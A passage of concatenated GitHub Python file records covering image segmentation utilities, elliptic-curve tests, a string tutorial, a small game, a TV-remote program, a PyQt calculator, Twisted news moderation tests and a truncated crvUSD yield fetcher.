cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sem_bdr_rgb)\n else:\n blend = sem_bdr_rgb\n return blend\n\ndef my_argmax(tensor):\n '''\n Fixes the zero channel problem i.e. the class predicted at 0th channel \n wont go to 0 as it does with usual np.argmax\n Parameters\n ----------\n pred_tensor : 3D/4D array of shape [B, H, W, N] or [H, W, N]\n Returns\n -------\n argmaxed output of shape [B, H, W] or [H, W]]\n '''\n pred_tensor = np.copy(tensor)\n j = 0\n for i in range(pred_tensor.shape[-1]):\n j = i+1\n pred_tensor[:,:,:,i] = pred_tensor[:,:,:,i] * j\n \n pred_tensor = np.sum(pred_tensor, axis=-1)\n return pred_tensor \n\ndef plot_confusion_matrix(cm, class_names, normalize = True, show_text = True, from_clf = False, my_cmap = 'Greens'):\n '''\n Parameters\n ----------\n cm : a nxn dim numpy array.\n class_names: a list of class names (str type)\n normalize: whether to normalize the values\n show_text: whether to show value in each block of the matrix, If matrix is large like 10x10 or 20x20 it's better to set it to false\n because it'll be difficult to read values but you can see the network behaviour via color map.\n show_fpfn: whether to show false positives on GT axis and false negatives on Pred axis. 
FN -> not detected & FP -> wrong detections\n Returns\n -------\n fig: a plot of confusion matrix along with colorbar\n '''\n if from_clf:\n conf_mat = cm\n x_labels = copy.deepcopy(class_names)\n y_labels = copy.deepcopy(class_names)\n else:\n conf_mat = cm[1:, 1:]\n x_labels = class_names\n y_labels = class_names \n \n c_m = conf_mat\n \n if normalize:\n row_sums = c_m.sum(axis=1)\n c_m = c_m / row_sums[:, np.newaxis]\n c_m = np.round(c_m, 3)\n \n fig, ax = plt.subplots(figsize=(len(class_names)+3, len(class_names)+3))\n im = ax.imshow(c_m, cmap = my_cmap) \n \n # We want to show all ticks...\n ax.set_xticks(np.arange(len(y_labels)))\n ax.set_yticks(np.arange(len(x_labels)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(y_labels)\n ax.set_yticklabels(x_labels)\n \n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")#ha=right\n \n if show_text:\n for i in range(len(x_labels)):\n for j in range(len(y_labels)):\n text = ax.text(j, i, c_m[i, j], color=\"k\", ha=\"center\", va=\"center\")#color=clr_select(i, j)\n \n ax.set_title(\"Normalized Confusion Matrix\")\n fig.tight_layout()\n plt.xlabel('Predicted Labels')\n plt.ylabel('True Labels')\n sm = plt.cm.ScalarMappable(cmap=my_cmap, norm=plt.Normalize(vmin=0, vmax=1))\n sm._A = []\n plt.colorbar(sm)\n plt.show() \n return fig \n\ndef water(img, mask):\n '''\n Parameters\n ----------\n img : 3D array, RGB iamge [H W 3]\n mask : 2D array, semantic/binary segmentaion mask [H W]\n\n Returns\n -------\n img : RGB image wiht overlayd boundry instances\n new : instacnes boundaries\n '''\n img = (img).astype(np.uint8)\n mask = (mask).astype(np.uint8)\n original_image = np.copy(img)\n \n # apply threshold to converto sem-mask to binary mask\n ret, thresh = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # so that BG pixel have 0 value and FG will have 255 value\n thresh = 255 - thresh\n \n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n \n # sure background area\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\n \n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n # Normalize the distance image for range = {0.0, 1.0}\n # so we can visualize and threshold it \n dist_transform = cv2.normalize(dist_transform, dist_transform, 0, 1.0, cv2.NORM_MINMAX)\n _, sure_fg = cv2.threshold(dist_transform, 0.4, 1.0, cv2.THRESH_BINARY)\n #ret, sure_fg = cv2.threshold(dist_transform, 0.7*dist_transform.max(), 255, 0)\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg,sure_fg)\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n # Now, mark the region of unknown with zero\n markers[unknown==255] = 0\n \n # remove bg form the image so that water shed will only focus on cells\n img[thresh==0]=1\n \n markers = markers.astype('int32')\n markers = cv2.watershed(img, markers)\n # draw boundaries on real iamge\n original_image[markers == -1] = [255,0,0]\n # draw boundary on empty convas\n new = np.zeros(img.shape)\n new[markers == -1] = [255, 255, 255]\n new = (new).astype(np.uint8)\n new = cv2.cvtColor(new, cv2.COLOR_BGR2GRAY)\n new = (new/255).astype(np.uint8)\n return original_image, new\n\n\ndef sigmoid_activation(pred):\n pred = tf.convert_to_tensor(pred)\n 
active_preds = tf.keras.activations.sigmoid(pred)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds\n\ndef softmax_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.softmax(pred, axis=-1)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds","repo_name":"Mr-TalhaIlyas/TSFD","sub_path":"slide_inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":26272,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"}
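A small sketch of calling the stain-deconvolution helper from the utils.py record above on a dummy tile (the random array simply stands in for an H&E patch; deconv_stains and her_from_rgb are assumed to be in scope):

import numpy as np

rgb = np.random.randint(0, 255, size=(256, 256, 3), dtype=np.uint8)  # stand-in H&E patch
her = deconv_stains(rgb, her_from_rgb)   # channel 0: Haematoxylin, 1: Eosin, 2: residual
print(her.shape, her.dtype)              # (256, 256, 3) uint8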
+{"seq_id":"34099645123","text":"import pytest\nfrom keum import FiniteField, PrimeFiniteField\nfrom keum import (\n babyjubjub,\n secp256k1,\n secp256r1,\n pallas,\n vesta,\n tweedledee,\n tweedledum,\n bn254,\n grumpkin,\n)\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n pallas.ProjectiveWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef Ec(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n pallas.ProjectiveWeierstrass,\n ]\n)\ndef ProjectiveEc(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef AffineEc(request):\n return request.param\n\n\ndef test_affine_random_is_on_the_curve(AffineEc):\n a = AffineEc.random()\n assert AffineEc.is_on_curve(a.x, a.y)\n\n\n# def test_affine_encoding_decoding(AffineEc):\n# a = AffineEc.random()\n# assert AffineEc.of_be_bytes_exn(a.to_be_bytes()) == a\n# assert AffineEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_projective_encoding_decoding(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.of_be_bytes_exn(a.to_be_bytes()) == a\n assert ProjectiveEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_affine_generator_is_on_curve(AffineEc):\n g = AffineEc.generator()\n assert AffineEc.is_on_curve(g.x, g.y)\n\n\ndef test_projective_random_is_on_the_curve(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.is_on_curve(x=a.x, y=a.y, z=a.z)\n\n\ndef test_projective_generator_is_on_curve(ProjectiveEc):\n g = ProjectiveEc.generator()\n assert ProjectiveEc.is_on_curve(x=g.x, y=g.y, z=g.z)\n\n\ndef test_zero_is_identity_for_addition(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a + zero == a\n assert zero + a == a\n\n\ndef test_equality_handles_zero(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a != zero\n assert Ec.zero() == Ec.zero()\n\n\ndef test_negate_identity(Ec):\n assert Ec.zero().negate() == Ec.zero()\n\n\ndef test_negate(Ec):\n a = Ec.random()\n assert a == a.negate().negate()\n\n\ndef test_addition_support_same_points(Ec):\n p = Ec.random()\n assert p + p == p.double()\n\n\ndef test_affine_addition_of_two_points_is_on_the_curve(AffineEc):\n p1 = AffineEc.random()\n p2 = AffineEc.random()\n p = p1 + p2\n assert AffineEc.is_on_curve(x=p.x, y=p.y)\n\n\ndef test_projective_addition_of_two_points_is_on_the_curve(ProjectiveEc):\n p1 = ProjectiveEc.random()\n p2 = ProjectiveEc.random()\n p = p1 + p2\n assert ProjectiveEc.is_on_curve(x=p.x, y=p.y, z=p.z)\n\n\ndef test_mul_zero_gives_identity(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(0)) == Ec.zero()\n\n\ndef test_mul_one_gives_same_point(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(1)) == p\n\n\ndef test_mul_by_two_gives_double(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(2)) == p.double()\n\n\ndef test_add_is_commutative(Ec):\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = p1 + p2\n rhs = p2 + p1\n assert lhs == rhs\n\n\ndef test_distributivity_scalar_multiplication(Ec):\n a = Ec.Fr.random()\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = (p1 + p2).mul(a)\n rhs = p1.mul(a) + p2.mul(a)\n assert lhs == 
rhs\n","repo_name":"dannywillems/py-keum","sub_path":"tests/test_ec.py","file_name":"test_ec.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74874877767","text":"'92'.zfill(5)\n# '00092'\n\n'9123'.zfill(5)\n# '09123'\n\nmsg = 'Hello world!'\nmsg.count('l')\n# 3\n\nmsg.endswith('!')\n# True\n\nmsg.startswith('L')\n# False\n\nmsg.find('w')\n# 7\n\n'hello4'.isdigit()\n# False\n\n'4'.isdigit()\n# True\n\nmsgList = ['hello','world','test']\n\"-\".join(msgList)\n# 'hello-world-test'\n\n\"LOL\".lower()\n# 'lol'\n\n\"lololol\".upper()\n# 'LOLOLOL\n\n'mr Potato'.capitalize()\n# 'Mr Potato'\n\n\"LOL\".isupper()\n# True\n\n'lol'.isupper()\n# False\n\nvegs = 'tomato-potato-carrot'\nvegs.replace('-','=')\n# tomato=potato=carrot\n\nvegs.replace('-','=',1)\n# tomato=potato-carrot\n\ntext = \"I admire you so much\"\ntext.replace(' ','...')\n# 'I...admire...you...so...much'\n\nanimals = \"goats,chickens,ducks,pigs,alpacas\"\nanimals.split(',')\n# ['goats','chickens','ducks','pigs','alpacas']\n\n\"\"\"\nHello\nI\nSee\nYou\"\"\".splitlines()\n# ['','Hello','I','See','You']\n\nuser_input = ' catlady '\nuser_input.strip()\n# 'catlady'\n\nuser_input2 = ' ca t l a dy '\nuser_input2.strip()\n# 'ca t l a dy'\n# doesn't remove the spaces in between the chars","repo_name":"khelyorbek/Learning","sub_path":"18_Python/18_2_Python Data Structures/7_string_methods.py","file_name":"7_string_methods.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41880483578","text":"\"\"\"Defending the earth mother.\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport grimoire\nfrom utils import inventories\n\nP = np.exp(-np.log(2.0)/52.0)\n\"\"\"Cone survival probability per week\"\"\"\n\ndef drop(trans):\n \"\"\"Drops magic cones, maybe.\"\"\"\n spells = list(grimoire.SPELLBOOK.keys())\n nspells = len(spells)\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n if (cones <= 512 and p <= cones / 1024.0) or \\\n (cones > 512 and p <= cones / 2.0**(int(np.log2(cones)) + 2)):\n hist.append({'player': player, 'kind': 'drop', \n 'magic': {spells[np.random.randint(0, nspells)]: 1}})\n\ndef decay(trans):\n \"\"\"Decays cones weekly - you must stay active!\"\"\"\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n # trick to obtain average decay behaviour, even in small samples, \n # without having to roll for each cone individually.\n q, r = divmod(cones*P, 1)\n n = int(q) + int(p <= r)\n if n != cones:\n hist.append({'player': player, 'kind': 'decay', 'cones': n - cones})\n \n \n ","repo_name":"pyne/magic-cones","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43931810327","text":"import time\nimport random\nimport msvcrt\n\nclass Kumanda():\n def __init__(self,televizyon_durumu = \"Kapalı\",ses_düzeyi = 0,kanal_listesi = [\"TRT\"],açık_kanal = \"TRT\"):\n print(\"Televizyon oluşturuluyor...\")\n self.televizyon_durumu = televizyon_durumu\n self.ses_düzeyi = ses_düzeyi\n self.kanal_listesi = kanal_listesi\n self.açık_kanal = açık_kanal\n def sesi_düzenle(self):\n while True:\n karakter = input(\"Sesi artırmak için'Arttır'\\nSesi azaltmak için'Azalt'\\nÇıkmak için 'çıkış' yazınız.\\nSeçim:\")\n if (karakter == \"Arttır\"):\n while True:\n x = int(input(\"Arttırmak istediğiniz miktarı giriniz:\\n\"))\n if (x < 0):\n print(\"Böyle bir sayı arttıramazsınız...\")\n elif(x > 0):\n self.ses_düzeyi += x\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"Azalt\"):\n while True:\n y = int(input(\"Azaltmak istediğiniz miktarı giriniz:\\n\"))\n if (y < 0):\n print(\"Böyle bir sayı kadar azaltamazsınız...\")\n elif (y > 0):\n self.ses_düzeyi -= y\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"çıkış\"):\n print(\"Komut alındı\")\n time.sleep(0.5)\n print(\"Çıkış yapılıyor\")\n break\n else:\n print(\"Geçersiz işlem\")\n def tv_kapat(self):\n if (self.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon zaten kapalı....\")\n else:\n print(\"Tv Kapatılıyor...\")\n time.sleep(0.5)\n print(\"Tv kapatıldı...\")\n self.televizyon_durumu = \"Kapalı\"\n def tv_aç(self):\n if (self.televizyon_durumu == \"Açık\"):\n print(\"Televizyon zaten açık...\")\n else:\n print(\"Televizyon açılıyor...\")\n time.sleep(0.5)\n print(\"Televizyon açıldı....\")\n self.televizyon_durumu = \"Açık\"\n def __str__(self):\n return \"TV durumu:{}\\nSes düzeyi:{}\\nKanal Listesi:{}\\nAçık kanal:{}\".format(self.televizyon_durumu,self.ses_düzeyi,self.kanal_listesi,self.açık_kanal)\n def __len__(self):\n return len(self.kanal_listesi)\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi) - 1)\n self.açık_kanal = self.kanal_listesi[rastgele]\n print(\"Şuan açık kanal:\",self.açık_kanal)\n def kanal_ekle(self,kanal):\n print(\"Kanal eklendi:\",kanal)\n self.kanal_listesi.append(kanal)\nkumanda = Kumanda()\nprint(\"\"\"*******************\n\nTelevizyon Uygulaması\n\nİşlemler ;\n\n1. Televizyonu Aç\n\n2. Televizyonu Kapat\n\n3. Televizyon Bilgileri\n\n4. Kanal Sayısını Öğrenme\n\n5. Kanal Ekle\n\n6. Rastgele Kanal'a Geç\n\n7. 
Sesi Düzenle\n\nÇıkmak için 'Çıkış' yazın.\n*******************\"\"\")\nwhile True:\n işlem = input(\"Lütfen gireceğiniz işlemi seçiniz:\")\n if (işlem == \"1\"):\n kumanda.tv_aç()\n elif(işlem == \"2\"):\n kumanda.tv_kapat()\n elif(işlem == \"3\"):\n print(kumanda)\n elif(işlem == \"4\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n print(\"Kanal sayısı :\", len(kumanda))\n elif(işlem == \"5\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kanallar = input(\"Eklemek İstediğiniz Kanalları ',' ile ayırarak girin:\")\n eklenecekler = kanallar.split(\",\")\n for i in eklenecekler:\n kumanda.kanal_ekle(i)\n print(\"Kanal Listesi başarıyla güncellendi...\")\n elif (işlem == \"6\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.rastgele_kanal()\n elif(işlem == \"7\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.sesi_düzenle()\n elif(işlem == \"Çıkış\"):\n print(\"Çıkış yapılıyor...%\",random.randint(0,50))\n time.sleep(1)\n print(\"Çıkış yapılıyor...%\", random.randint(50,99))\n time.sleep(1)\n print(\"Çıkış yapılıyor...½100\")\n time.sleep(1)\n print(\"Çıkış yapıldı...\")\n break\n else:\n print(\"Böyle bir işlem yapamazsınız!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oayk23/python_repository","sub_path":"kumanda.py","file_name":"kumanda.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5102580490","text":"import os\r\nimport sys\r\nimport math\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\nfrom functools import partial\r\n\r\nqtCreatorFile = \"AppGui.ui\"\r\nif os.path.isfile ( qtCreatorFile ):\r\n\t# Use AppGui.ui file for debug\r\n\tUi_MainWindow, QtBaseClass = uic.loadUiType ( qtCreatorFile )\r\nelse:\r\n\t# Use converted AppGui.py file for release\r\n\tfrom AppGui import Ui_MainWindow\r\n\r\n\r\nclass Calculator ( QtWidgets.QMainWindow, Ui_MainWindow ):\r\n\t'''\r\n\tCalculator application.\r\n\t'''\r\n\tdef __init__ ( self ):\r\n\t\tQtWidgets.QMainWindow.__init__ ( self )\r\n\t\tUi_MainWindow.__init__ ( self )\r\n\t\tself.setupUi ( self )\r\n\t\tself.setWindowFlags ( QtCore.Qt.Window | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint |\r\n\t\t QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowStaysOnTopHint |\r\n\t\t QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint )\r\n\r\n\t\tself.listButtons = [ self.btn0, self.btn1, self.btn2, self.btn3,\r\n\t\t\t\t\t\t\t self.btn4, self.btn5, self.btn6, self.btn7,\r\n\t\t\t\t\t\t\t self.btn8, self.btn9, self.btnDot,\r\n\t\t\t\t\t\t\t self.btnPlus, self.btnMinus, self.btnMultiply, self.btnDivide,\r\n\t\t\t\t\t\t\t self.btnDel, self.btnAc, self.btnEqual, self.btnSquareRoot ]\r\n\r\n\t\tfor index in range ( 15 ):\r\n\t\t\t# for some reason, lamda doesn't work here but partial works\r\n\t\t\t#self.listButtons [ index ].clicked.connect ( lambda: self.cbBtnNumberClicked ( self.listButtons [ index ].text () ) )\r\n\t\t\tself.listButtons [ index ].clicked.connect ( partial ( self.cbBtnNumberClicked, self.listButtons [ index ].text () ) )\r\n\r\n\t\tself.btnDel.clicked.connect ( self.cbBtnDelClicked )\r\n\t\tself.btnAc.clicked.connect ( self.cbBtnAcClicked )\r\n\t\tself.btnEqual.clicked.connect ( self.cbBtnEqualClicked )\r\n\t\tself.btnSquareRoot.clicked.connect ( self.cbBtnSquareRootClicked )\r\n\r\n\tdef cbBtnNumberClicked ( self, text ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tnew_value = current_value + str ( text )\r\n\t\tself.txtResult.setText ( new_value )\r\n\r\n\tdef cbBtnEqualClicked ( self ):\r\n\t\tresult = eval ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( result ) )\r\n\r\n\tdef cbBtnAcClicked ( self ):\r\n\t\tself.txtResult.setText ( \"\" )\r\n\r\n\tdef cbBtnDelClicked ( self ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tself.txtResult.setText ( current_value[:-1] )\r\n\r\n\tdef cbBtnSquareRootClicked ( self ):\r\n\t\tvalue = float ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( math.sqrt ( value ) ) )\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\twindow = Calculator()\r\n\twindow.show()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"ylyang-dev/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71710699848","text":"__metaclass__ = type\n\nfrom email.Parser import Parser\nfrom socket import gethostname\n\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import succeed\nfrom twisted.mail.smtp import messageid\nfrom twisted.news.database import Article, PickleStorage, NewsShelf\n\n\n\nclass ModerationTestsMixin:\n \"\"\"\n Tests for the moderation features of L{INewsStorage} implementations.\n \"\"\"\n def setUp(self):\n self._email = []\n\n\n def sendmail(self, smtphost, from_addr, to_addrs, msg,\n senderDomainName=None, port=25):\n \"\"\"\n Fake of L{twisted.mail.smtp.sendmail} which records attempts to send\n email and immediately pretends success.\n\n Subclasses should arrange for their storage implementation to call this\n instead of the real C{sendmail} function.\n \"\"\"\n self._email.append((\n smtphost, from_addr, to_addrs, msg, senderDomainName, port))\n return succeed(None)\n\n\n _messageTemplate = \"\"\"\\\nFrom: some dude\nTo: another person\nSubject: activities etc\nMessage-ID: %(articleID)s\nNewsgroups: %(newsgroup)s\n%(approved)s\nBody of the message is such.\n\"\"\".replace('\\n', '\\r\\n')\n\n\n def getApprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message including an\n I{Approved} header indicating it has passed through moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': 'Approved: yup\\r\\n'}\n\n\n def getUnapprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message with no\n I{Approved} header indicating it may require moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': '\\r\\n'}\n\n\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Override in a subclass to return a L{INewsStorage} provider to test for\n correct moderation behavior.\n\n @param groups: A C{list} of C{str} naming the groups which should exist\n in the resulting storage object.\n\n @param moderators: A C{dict} mapping C{str} each group name to a C{list}\n of C{str} giving moderator email (RFC 2821) addresses.\n \"\"\"\n raise NotImplementedError()\n\n\n def test_postApproved(self):\n \"\"\"\n L{INewsStorage.postRequest} posts the message if it includes an\n I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getApprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbPosted(ignored):\n self.assertEqual(self._email, [])\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertTrue)\n return exists\n result.addCallback(cbPosted)\n return result\n\n\n def test_postModerated(self):\n \"\"\"\n L{INewsStorage.postRequest} forwards a message to the moderator if it\n does not include an I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getUnapprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbModerated(ignored):\n self.assertEqual(len(self._email), 1)\n self.assertEqual(self._email[0][0], 
mailhost)\n self.assertEqual(self._email[0][1], sender)\n self.assertEqual(self._email[0][2], [moderator])\n self._checkModeratorMessage(\n self._email[0][3], sender, moderator, group, message)\n self.assertEqual(self._email[0][4], None)\n self.assertEqual(self._email[0][5], 25)\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertFalse)\n return exists\n result.addCallback(cbModerated)\n return result\n\n\n def _checkModeratorMessage(self, messageText, sender, moderator, group, postingText):\n p = Parser()\n msg = p.parsestr(messageText)\n headers = dict(msg.items())\n del headers['Message-ID']\n self.assertEqual(\n headers,\n {'From': sender,\n 'To': moderator,\n 'Subject': 'Moderate new %s message: activities etc' % (group,),\n 'Content-Type': 'message/rfc822'})\n\n posting = p.parsestr(postingText)\n attachment = msg.get_payload()[0]\n\n for header in ['from', 'to', 'subject', 'message-id', 'newsgroups']:\n self.assertEqual(posting[header], attachment[header])\n\n self.assertEqual(posting.get_payload(), attachment.get_payload())\n\n\n\nclass PickleStorageTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{PickleStorage}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{PickleStorage} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n storage = PickleStorage(\n storageFilename, groups, moderators, mailhost, sender)\n storage.sendmail = self.sendmail\n self.addCleanup(PickleStorage.sharedDBs.pop, storageFilename)\n return storage\n\n\n\nclass NewsShelfTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{NewsShelf}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{NewsShelf} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n shelf = NewsShelf(mailhost, storageFilename, sender)\n for name in groups:\n shelf.addGroup(name, 'm') # Dial 'm' for moderator\n for address in moderators.get(name, []):\n shelf.addModerator(name, address)\n shelf.sendmail = self.sendmail\n return shelf\n\n\n def test_notifyModerator(self):\n \"\"\"\n L{NewsShelf.notifyModerator} sends a moderation email to a single\n moderator.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp(), 'alice@example.com')\n shelf.sendmail = self.sendmail\n shelf.notifyModerator('bob@example.org', Article('Foo: bar', 'Some text'))\n self.assertEqual(len(self._email), 1)\n\n\n def test_defaultSender(self):\n \"\"\"\n If no sender is specified to L{NewsShelf.notifyModerators}, a default\n address based on the system hostname is used for both the envelope and\n RFC 2822 sender addresses.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp())\n shelf.sendmail = self.sendmail\n shelf.notifyModerators(['bob@example.org'], Article('Foo: bar', 'Some text'))\n self.assertEqual(self._email[0][1], 'twisted-news@' + gethostname())\n self.assertIn('From: twisted-news@' + gethostname(), self._email[0][3])\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/twisted/news/test/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"}
+{"seq_id":"37659028913","text":"from operator import and_\nfrom typing import List\nimport requests\nfrom sqlalchemy import func\nimport logging\nfrom main import db\nfrom models.convex.snapshot import ConvexPoolSnapshot\nfrom models.curve.crvusd import CrvUsdYield\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_latest_convex_pool_apr() -> List:\n subquery = (\n db.session.query(\n ConvexPoolSnapshot.poolName,\n func.max(ConvexPoolSnapshot.timestamp).label(\"max_timestamp\"),\n )\n .filter(\n ConvexPoolSnapshot.poolName.ilike(\n \"%Curve.fi Factory Plain Pool: crvUSD%\"\n )\n )\n .group_by(ConvexPoolSnapshot.poolName)\n .subquery()\n )\n\n result = (\n db.session.query(\n ConvexPoolSnapshot.baseApr,\n ConvexPoolSnapshot.crvApr,\n ConvexPoolSnapshot.cvxApr,\n ConvexPoolSnapshot.extraRewardsApr,\n ConvexPoolSnapshot.timestamp,\n ConvexPoolSnapshot.poolName,\n )\n .join(\n subquery,\n and_(\n ConvexPoolSnapshot.poolName == subquery.c.poolName,\n ConvexPoolSnapshot.timestamp == subquery.c.max_timestamp,\n ),\n )\n .all()\n )\n\n return [\n CrvUsdYield(\n platform=\"Convex\", pool=r[5], apy=(r[0] + r[1] + r[2] + r[3]) * 100\n )\n for r in result\n ]\n\n\ndef get_max_boost_curve_yield() -> List[CrvUsdYield]:\n CURVE_APR = \"https://www.convexfinance.com/api/curve-apys\"\n r = requests.get(CURVE_APR)\n return [\n CrvUsdYield(\n platform=\"Curve (max boost)\",\n pool=k,\n apy=v[\"crvApy\"] + v[\"baseApy\"],\n )\n for k, v in r.json()[\"apys\"].items()\n if \"factory-crvusd\" in k\n ]\n\n\ndef get_std_yields() -> List[CrvUsdYield]:\n STD_YIELD = \"https://lockers.stakedao.org/api/strategies/cache/curve\"\n r = requests.get(STD_YIELD)\n yields = {\n a[\"name\"]: sum([b[\"apr\"] for b in a[\"aprBreakdown\"]]) * 100\n for a in r.json()\n if \"crvusd\" in a[\"key\"]\n }\n return [\n CrvUsdYield(platform=\"StakeDAO\", pool=k, apy=v)\n for k, v in yields.items()\n ]\n\n\ndef get_crv_usd_yields() -> 